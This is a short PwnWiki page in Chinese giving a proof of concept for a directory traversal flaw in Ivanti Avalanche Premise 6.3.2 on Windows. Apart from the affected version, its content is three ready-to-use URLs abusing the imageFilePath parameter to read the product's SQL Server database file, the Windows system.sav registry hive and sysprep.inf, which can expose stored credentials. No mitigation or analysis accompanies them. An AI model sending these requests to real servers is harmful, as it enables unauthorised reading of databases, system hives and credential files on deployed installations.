Ivanti Avalanche 目錄遍歷漏洞

From PwnWiki
Revision as of 10:31, 22 May 2021 by Pwnwiki (talk | contribs) (Created page with "==影響版本== Windows v6.3.2.3490 的 Avalanche Premise 6.3.2 ==POC== <pre> 數據庫讀取: https://EXAMPLE_IP:8443/AvalancheWeb/image?imageFilePath=C:/Program Files/Mi...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

影響版本

Windows v6.3.2.3490 的 Avalanche Premise 6.3.2

POC

數據庫讀取:
https://EXAMPLE_IP:8443/AvalancheWeb/image?imageFilePath=C:/Program Files/Microsoft SQL Server/MSSQL11.SQLEXPRESS/MSSQL/DATA/Avalanche.mdf

其它:
https://EXAMPLE_IP:8443/AvalancheWeb/image?imageFilePath=C:/Windows/system32/config/system.sav
https://EXAMPLE_IP:8443/AvalancheWeb/image?imageFilePath=C:/sysprep/sysprep.inf
Retrieved from "https://pwnwiki.com/index.php?title=Ivanti_Avalanche_目錄遍歷漏洞&oldid=3041"